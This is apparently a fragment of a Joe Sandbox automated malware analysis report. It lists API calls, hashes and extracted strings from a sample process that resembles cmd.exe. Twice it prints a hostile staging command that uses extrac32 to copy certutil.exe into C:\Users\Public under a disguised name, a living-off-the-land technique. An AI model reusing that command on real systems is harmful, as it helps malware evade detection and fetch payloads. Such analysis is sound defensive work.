                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationQueryToken
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4239771691-0
                                                                                                                                                                        • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                                                                                                        • Instruction ID: a31ecb8dd5cd81ad8a52aee7404e94eb34b89ce93cf58ce3ccafaf36cf5459b1
                                                                                                                                                                        • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                                                                                                        • Instruction Fuzzy Hash: 8FF030B3714B81CBD7008F64E5884DCB778FB44B84B95853ACB2843704DB76D9A8CB44
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6E94393BB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                        • Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                                                                                                        • Instruction ID: 88b340470d2f3eed73ebe17883b36e79abf2d3a09656ec6f76cdf378f2102f70
                                                                                                                                                                        • Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                                                                                                        • Instruction Fuzzy Hash: A3B01291F25402D1D708EF71DC851A012A07F5C710FC01471C00EC0160DE2ED1DFC705
                                                                                                                                                                        APIs
                                                                                                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF6E942F52A,00000000,00000000,?,00000000,?,00007FF6E942E626,?,?,00000000,00007FF6E9431F69), ref: 00007FF6E942F8DE
                                                                                                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F8FB
                                                                                                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F951
                                                                                                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F96B
                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942FA8E
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E942FB14
                                                                                                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942FB2D
                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942FBEA
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E942F996
                                                                                                                                                                          • Part of subcall function 00007FF6E9430010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF6E944849D,?,?,?,00007FF6E944F0C7), ref: 00007FF6E9430045
                                                                                                                                                                          • Part of subcall function 00007FF6E9430010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6E944F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E9430071
                                                                                                                                                                          • Part of subcall function 00007FF6E9430010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9430092
                                                                                                                                                                          • Part of subcall function 00007FF6E9430010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6E94300A7
                                                                                                                                                                          • Part of subcall function 00007FF6E9430010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6E9430181
                                                                                                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E943D401
                                                                                                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E943D41B
                                                                                                                                                                        • longjmp.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E943D435
                                                                                                                                                                        • longjmp.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E943D480
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                                                                                                                        • String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                        • API String ID: 3964947564-518410914
                                                                                                                                                                        • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                                                                                        • Instruction ID: f11491fd3a9cfbd86ad8d8ec6a93957a99af7b9c50ae7648930a1561e012b7ad
                                                                                                                                                                        • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                                                                                        • Instruction Fuzzy Hash: 45027C73A19602C6FB149F31A85437866A1FF4AB54F944235D90EC36A1EF3FA84CC70A
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: _wcsicmp$iswspacewcschr
• String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
• API String ID: 840959033-3627297882
• Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
• Instruction ID: c7aeab089b9f7628b17573abfa337ace0854aa88f9e5d843b40646b6c30570bb
• Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
• Instruction Fuzzy Hash: 10D14563A08647C6FB10AF71A8493B927A1BF44B44F448035DA4EC63A5EE3EE44DC71A
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: _wcsicmp$EnvironmentVariable
• String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
• API String ID: 198002717-267741548
• Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
• Instruction ID: 7276b3592198f0cd5e5591fe05e01afe6b7947f11a08dedf80eaac8d9edf0591
• Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
• Instruction Fuzzy Hash: 9E510C62A08743C6FB149F65A814379BBA0FF4AB80F44A235D90E87755DF2EE44CC74A
APIs
• iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF6E942E626,?,?,00000000,00007FF6E9431F69), ref: 00007FF6E942F000
• wcschr.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F031
• iswdigit.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F0D6
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: iswdigitiswspacewcschr
• String ID: ()|&=,;"$=,;$Ungetting: '%s'
• API String ID: 1595556998-2755026540
• Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
• Instruction ID: a03ac9fafca4cf9700b1a35a8069b8bd5d9d0e026299cc3dcdb925c40dd1dce7
• Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
• Instruction Fuzzy Hash: CC228CA7E08656C1FB649F25A54437926A0BF06B90FC04172D98DC32E1EF3EA48DC71B
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: Heap$Processwcschr$Alloc$Sizeiswspace
• String ID: "$=,;
• API String ID: 3545743878-4143597401
• Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
• Instruction ID: b7cf5b8f2de817b004580f62814f6e57a008b8a6f8cfd5e48d14426d10127b99
• Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
• Instruction Fuzzy Hash: 51C16967A09792C2EB65AF1190043B976E0BF89F45F499135DE4EC3394EF3EA449C30A
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: CurrentFormatMessageThread
• String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
• API String ID: 2411632146-3173542853
• Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
• Instruction ID: 55035c9e9d619140f57e378967e898629cd2d540b8526957cd2eeadc4f641fa9
• Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
• Instruction Fuzzy Hash: 72616AB2A19642C1EB24DF91A8047B963A4FF44B84F44413ADE4D87758DF3EE54ACB0A
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: CreateFile_open_osfhandle
• String ID: con
• API String ID: 2905481843-4257191772
• Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
• Instruction ID: 77a4eea96e4cd48e4847b908c555b6a38946d185274eecfbb37fe0f7dbe8e67a
• Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
• Instruction Fuzzy Hash: 1D716C73A08681CAE760CF34A444379BAA0FF8AB61F544234DE5A82794DF3ED44DCB05
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
• String ID:
• API String ID: 3829876242-3916222277
• Opcode ID: 4f22813eede9613b07e2ee34b1665593af95064faf104fdc635e57dc54895536
• Instruction ID: 6a691cfb2e0e0f8ddb5b4104b0c8172f82b55b58e74ac3b85bcaf1059a3c88d8
• Opcode Fuzzy Hash: 4f22813eede9613b07e2ee34b1665593af95064faf104fdc635e57dc54895536
• Instruction Fuzzy Hash: 01616C27A08642C6EB249F11D41427AB7A1FF89F94F458134DE0E87794DF3EE80ACB45
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                                                                                                        • String ID: CSVFS$NTFS$REFS
                                                                                                                                                                        • API String ID: 3510147486-2605508654
                                                                                                                                                                        • Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                                                                                                                        • Instruction ID: 5bcb3aaa87656f2fc5fdf34ada2e853312160800a6410138107d0a702ec0e852
                                                                                                                                                                        • Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                                                                                                                        • Instruction Fuzzy Hash: AF614773608B82CAEB668F61D8543E977A5FF49B89F444139DA0D8B758DF3AD208C704
                                                                                                                                                                        APIs
                                                                                                                                                                        • longjmp.MSVCRT(?,00000000,00000000,00007FF6E9427279,?,?,?,?,?,00007FF6E942BFA9), ref: 00007FF6E9444485
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: longjmp
                                                                                                                                                                        • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                                                                                                        • API String ID: 1832741078-366822981
                                                                                                                                                                        • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                                                                        • Instruction ID: 57fa3baaa31f231f1fa34637a335536b21f16d78c2498b6e1262b0cfd5229404
                                                                                                                                                                        • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                                                                        • Instruction Fuzzy Hash: 34C17C33E0C686C1E6289F9661507BC2792BF46B84FA04036DD0DD7791CE3EA64EC74A
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDA6
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDBD
                                                                                                                                                                        • memset.MSVCRT ref: 00007FF6E942BA2B
                                                                                                                                                                        • wcschr.MSVCRT ref: 00007FF6E942BA8A
                                                                                                                                                                        • wcschr.MSVCRT ref: 00007FF6E942BAAA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heapwcschr$AllocProcessmemset
                                                                                                                                                                        • String ID: -$:.\$=,;$=,;+/[] "
                                                                                                                                                                        • API String ID: 2872855111-969133440
                                                                                                                                                                        • Opcode ID: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                                                                                                                                                        • Instruction ID: c741827d3432e8becd184f326678a86fb24b8a6d6a9b4473d9a5374f40e753ab
                                                                                                                                                                        • Opcode Fuzzy Hash: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                                                                                                                                                        • Instruction Fuzzy Hash: 96B18023A0DA42C1EA608F25949437D67A4FF8AB84F954235CE5EC7794DF3EE449C30A
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                                                                                                                        • String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                        • API String ID: 1606811317-2340392073
                                                                                                                                                                        • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                                                                                        • Instruction ID: af50cc434e3d40058c113cf3344a62c49fa02eed74dead18b1b2c786645ccac8
                                                                                                                                                                        • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                                                                                        • Instruction Fuzzy Hash: 4CD19D63A18A42C1EB119F25A8043B967A0FF46B94F844232DE5DC77A5DF3EE44DC70A
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$ErrorLast$InformationVolume
                                                                                                                                                                        • String ID: %04X-%04X$~
